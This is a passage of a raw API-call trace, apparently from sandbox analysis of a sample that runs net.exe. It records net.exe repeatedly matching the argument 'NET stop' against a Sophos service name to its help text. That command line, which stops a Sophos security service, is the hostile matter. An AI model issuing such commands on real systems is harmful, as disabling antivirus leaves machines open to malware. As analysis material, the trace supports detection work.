lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x14 [0050.170] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message", _String2="NET START SCHEDULE\r\n", _MaxCount=0x1a) returned 14 [0050.170] LocalFree (hMem=0x695638) returned 0x0 [0050.170] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x12 [0050.170] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message", _String2="NET START SERVER\r\n", _MaxCount=0x1a) returned 14 [0050.170] LocalFree (hMem=0x695638) returned 0x0 [0050.170] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0xf [0050.170] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message", _String2="NET START UPS\r\n", _MaxCount=0x1a) returned 14 [0050.170] LocalFree (hMem=0x695638) returned 0x0 [0050.170] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x17 [0050.170] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message", _String2="NET START WORKSTATION\r\n", _MaxCount=0x1a) returned 14 [0050.170] LocalFree (hMem=0x695638) returned 0x0 [0050.170] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x18 [0050.170] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x1a) returned 14 [0050.170] LocalFree (hMem=0x695638) returned 0x0 [0050.170] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x2a [0050.170] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message", _String2="NET STATISTICS\r\n[WORKSTATI", _MaxCount=0x1a) returned 14 [0050.170] LocalFree (hMem=0x695638) returned 0x0 [0050.170] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x15 [0050.170] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x1a) returned 19 [0050.170] LocalFree (hMem=0x695638) returned 0x0 [0050.170] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x58 [0050.170] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message", _String2="NET TIME\r\n\r\n[\\\\computernam", _MaxCount=0x1a) returned -1 [0050.170] LocalFree (hMem=0x695638) returned 0x0 [0050.171] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x184 [0050.171] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message", _String2="NET USE\r\n[devicename | *] ", _MaxCount=0x1a) returned -2 [0050.171] LocalFree (hMem=0x695638) returned 0x0 [0050.171] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0xc7 [0050.171] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message", _String2="NET USER\r\n[username [passw", _MaxCount=0x1a) returned -2 [0050.171] LocalFree (hMem=0x695638) returned 0x0 [0050.171] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x47 [0050.171] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message", _String2="NET VIEW\r\n[\\\\computername ", _MaxCount=0x1a) returned -3 [0050.171] LocalFree (hMem=0x695638) returned 0x0 [0050.171] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0xc2 [0050.171] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message", _String2="NET\r\n [ ACCOUNTS | COMP", _MaxCount=0x1a) returned 19 [0050.171] LocalFree (hMem=0x695638) returned 0x0 [0050.171] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x319 [0050.171] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message", _String2="SERVICES\r\nNET START can be", _MaxCount=0x1a) returned -5 [0050.171] LocalFree (hMem=0x695638) returned 0x0 [0050.171] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x483 [0050.171] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message", _String2="SYNTAX\r\nThe following conv", _MaxCount=0x1a) returned -5 [0050.171] LocalFree (hMem=0x695638) returned 0x0 [0050.171] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0xa86 [0050.171] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message", _String2="NAMES\r\nThe following types", _MaxCount=0x1a) returned 4 [0050.171] LocalFree (hMem=0x695638) returned 0x0 [0050.171] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x54 [0050.171] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message", _String2="\r\nFor more information on ", _MaxCount=0x1a) returned 97 [0050.171] LocalFree (hMem=0x695638) returned 0x0 [0050.171] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0xad [0050.171] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET ACCOUNTS\r\n[/FO", _MaxCount=0x12) returned 18 [0050.171] LocalFree (hMem=0x695638) returned 0x0 [0050.171] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x2e [0050.171] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET COMPUTER\r\n\\\\co", _MaxCount=0x12) returned 16 [0050.171] LocalFree (hMem=0x695638) returned 0x0 [0050.171] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x7d [0050.171] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET CONFIG SERVER\r", _MaxCount=0x12) returned 16 [0050.171] LocalFree (hMem=0x695638) returned 0x0 [0050.171] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x26 [0050.171] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET CONFIG\r\n[SERVE", _MaxCount=0x12) returned 16 [0050.172] LocalFree (hMem=0x695638) returned 0x0 [0050.172] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x19 [0050.172] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET CONTINUE\r\nserv", _MaxCount=0x12) returned 16 [0050.172] LocalFree (hMem=0x695638) returned 0x0 [0050.172] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x1b [0050.172] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET FILE\r\n[id [/CL", _MaxCount=0x12) returned 13 [0050.172] LocalFree (hMem=0x695638) returned 0x0 [0050.172] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0xbe [0050.172] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET GROUP\r\n[groupn", _MaxCount=0x12) returned 12 [0050.172] LocalFree (hMem=0x695638) returned 0x0 [0050.172] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x33 [0050.172] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET HELP\r\ncommand\r", _MaxCount=0x12) returned 11 [0050.172] LocalFree (hMem=0x695638) returned 0x0 [0050.172] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x19 [0050.172] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET HELPMSG\r\nmessa", _MaxCount=0x12) returned 11 [0050.172] LocalFree (hMem=0x695638) returned 0x0 [0050.172] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0xc1 [0050.172] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET LOCALGROUP\r\n[g", _MaxCount=0x12) returned 7 [0050.172] LocalFree (hMem=0x695638) returned 0x0 [0050.172] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x16 [0050.172] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET PAUSE\r\nservice", _MaxCount=0x12) returned 3 [0050.172] LocalFree (hMem=0x695638) returned 0x0 [0050.172] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x33 [0050.172] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET SESSION\r\n[\\\\co", _MaxCount=0x12) returned 15 [0050.172] LocalFree (hMem=0x695638) returned 0x0 [0050.172] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x234 [0050.172] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET SHARE\r\nsharena", _MaxCount=0x12) returned 12 [0050.172] LocalFree (hMem=0x695638) returned 0x0 [0050.172] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x13 [0050.172] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START BROWSER\r", _MaxCount=0x12) returned 14 [0050.172] LocalFree (hMem=0x695638) returned 0x0 [0050.173] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x14 [0050.173] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START CLIPBOOK", _MaxCount=0x12) returned 14 [0050.173] LocalFree (hMem=0x695638) returned 0x0 [0050.173] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x14 [0050.173] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START EVENTLOG", _MaxCount=0x12) returned 14 [0050.173] LocalFree (hMem=0x695638) returned 0x0 [0050.173] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x15 [0050.173] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START MESSENGE", _MaxCount=0x12) returned 14 [0050.173] LocalFree (hMem=0x695638) returned 0x0 [0050.173] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="瘸i⡋瓢/嘸i/") returned 0x15 [0050.173] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START NET LOGO", _MaxCount=0x12) returned 14 [0050.173] LocalFree (hMem=0x697638) returned 0x0 [0050.173] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="阸i⡋瓢/瘸i/") returned 0x16 [0050.173] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START RPCLOCAT", _MaxCount=0x12) returned 14 [0050.173] LocalFree (hMem=0x699638) returned 0x0 [0050.173] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="阸i⡋瓢/阸i/") returned 0x11 [0050.173] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START RPCSS\r\n", _MaxCount=0x12) returned 14 [0050.173] LocalFree (hMem=0x699638) returned 0x0 [0050.173] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="阸i⡋瓢/阸i/") returned 0x14 [0050.173] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START SCHEDULE", _MaxCount=0x12) returned 14 [0050.173] LocalFree (hMem=0x699638) returned 0x0 [0050.173] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="阸i⡋瓢/阸i/") returned 0x12 [0050.173] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START SERVER\r\n", _MaxCount=0x12) returned 14 [0050.173] LocalFree (hMem=0x699638) returned 0x0 [0050.173] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="阸i⡋瓢/阸i/") returned 0xf [0050.173] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START UPS\r\n", _MaxCount=0x12) returned 14 [0050.173] LocalFree (hMem=0x699638) returned 0x0 [0050.173] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="阸i⡋瓢/阸i/") returned 0x17 [0050.173] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START WORKSTAT", _MaxCount=0x12) returned 14 [0050.173] LocalFree (hMem=0x699638) returned 0x0 [0050.173] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="阸i⡋瓢/阸i/") returned 0x18 [0050.173] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START\r\n[servic", _MaxCount=0x12) returned 14 [0050.173] LocalFree (hMem=0x699638) returned 0x0 [0050.173] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="阸i⡋瓢/阸i/") returned 0x2a [0050.173] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET STATISTICS\r\n[W", _MaxCount=0x12) returned 14 [0050.174] LocalFree (hMem=0x699638) returned 0x0 [0050.174] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="阸i⡋瓢/阸i/") returned 0x15 [0050.174] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET STOP\r\nservice\r", _MaxCount=0x12) returned 19 [0050.174] LocalFree (hMem=0x699638) returned 0x0 [0050.174] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="阸i⡋瓢/阸i/") returned 0x58 [0050.174] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET TIME\r\n\r\n[\\\\com", _MaxCount=0x12) returned -1 [0050.174] LocalFree (hMem=0x699638) returned 0x0 [0050.174] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="阸i⡋瓢/阸i/") returned 0x184 [0050.174] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET USE\r\n[devicena", _MaxCount=0x12) returned -2 [0050.174] LocalFree (hMem=0x699638) returned 0x0 [0050.174] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="阸i⡋瓢/阸i/") returned 0xc7 [0050.174] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET USER\r\n[usernam", _MaxCount=0x12) returned -2 [0050.174] LocalFree (hMem=0x699638) returned 0x0 [0050.174] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="阸i⡋瓢/阸i/") returned 0x47 [0050.174] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET VIEW\r\n[\\\\compu", _MaxCount=0x12) returned -3 [0050.174] LocalFree (hMem=0x699638) returned 0x0 [0050.174] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="阸i⡋瓢/阸i/") returned 0xc2 [0050.174] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET\r\n [ ACCOUNT", _MaxCount=0x12) returned 19 [0050.174] LocalFree (hMem=0x699638) returned 0x0 [0050.174] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="阸i⡋瓢/阸i/") returned 0x319 [0050.174] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="SERVICES\r\nNET STAR", _MaxCount=0x12) returned -5 [0050.174] LocalFree (hMem=0x699638) returned 0x0 [0050.174] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="阸i⡋瓢/阸i/") returned 0x483 [0050.174] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="SYNTAX\r\nThe follow", _MaxCount=0x12) returned -5 [0050.174] LocalFree (hMem=0x699638) returned 0x0 [0050.174] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="阸i⡋瓢/阸i/") returned 0xa86 [0050.174] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NAMES\r\nThe followi", _MaxCount=0x12) returned 4 [0050.174] LocalFree (hMem=0x699638) returned 0x0 [0050.174] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="阸i⡋瓢/阸i/") returned 0x54 [0050.174] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="\r\nFor more informa", _MaxCount=0x12) returned 97 [0050.175] LocalFree (hMem=0x699638) returned 0x0 [0050.175] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="阸i⡋瓢/阸i/") returned 0xad [0050.175] _wcsnicmp (_String1="NET stop", _String2="NET ACCO", _MaxCount=0x8) returned 18 [0050.175] LocalFree (hMem=0x699638) returned 0x0 [0050.175] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="阸i⡋瓢/阸i/") returned 0x2e [0050.175] _wcsnicmp (_String1="NET stop", _String2="NET COMP", _MaxCount=0x8) returned 16 [0050.175] LocalFree (hMem=0x699638) returned 0x0 [0050.175] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="阸i⡋瓢/阸i/") returned 0x7d [0050.175] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0050.175] LocalFree (hMem=0x699638) returned 0x0 [0050.175] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="阸i⡋瓢/阸i/") returned 0x26 [0050.175] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0050.175] LocalFree (hMem=0x699638) returned 0x0 [0050.175] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="阸i⡋瓢/阸i/") returned 0x19 [0050.175] _wcsnicmp (_String1="NET stop", _String2="NET CONT", _MaxCount=0x8) returned 16 [0050.175] LocalFree (hMem=0x699638) returned 0x0 [0050.175] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="阸i⡋瓢/阸i/") returned 0x1b [0050.175] _wcsnicmp (_String1="NET stop", _String2="NET FILE", _MaxCount=0x8) returned 13 [0050.175] LocalFree (hMem=0x699638) returned 0x0 [0050.175] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="阸i⡋瓢/阸i/") returned 0xbe [0050.175] _wcsnicmp (_String1="NET stop", _String2="NET GROU", _MaxCount=0x8) returned 12 [0050.175] LocalFree (hMem=0x699638) returned 0x0 [0050.175] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="阸i⡋瓢/阸i/") returned 0x33 [0050.175] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0050.175] LocalFree (hMem=0x699638) returned 0x0 [0050.175] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="阸i⡋瓢/阸i/") returned 0x19 [0050.175] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0050.175] LocalFree (hMem=0x699638) returned 0x0 [0050.175] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="阸i⡋瓢/阸i/") returned 0xc1 [0050.175] _wcsnicmp (_String1="NET stop", _String2="NET LOCA", _MaxCount=0x8) returned 7 [0050.175] LocalFree (hMem=0x699638) returned 0x0 [0050.175] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="阸i⡋瓢/阸i/") returned 0x16 [0050.175] _wcsnicmp (_String1="NET stop", _String2="NET PAUS", _MaxCount=0x8) returned 3 [0050.175] LocalFree (hMem=0x699638) returned 0x0 [0050.175] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="阸i⡋瓢/阸i/") returned 0x33 [0050.175] _wcsnicmp (_String1="NET stop", _String2="NET SESS", _MaxCount=0x8) returned 15 [0050.176] LocalFree (hMem=0x699638) returned 0x0 [0050.176] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="阸i⡋瓢/阸i/") returned 0x234 [0050.176] _wcsnicmp (_String1="NET stop", _String2="NET SHAR", _MaxCount=0x8) returned 12 [0050.176] LocalFree (hMem=0x699638) returned 0x0 [0050.176] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="阸i⡋瓢/阸i/") returned 0x13 [0050.176] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0050.176] LocalFree (hMem=0x699638) returned 0x0 [0050.176] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="阸i⡋瓢/阸i/") returned 0x14 [0050.176] _wcsnicmp (_String1="NET stop", _String2="NET 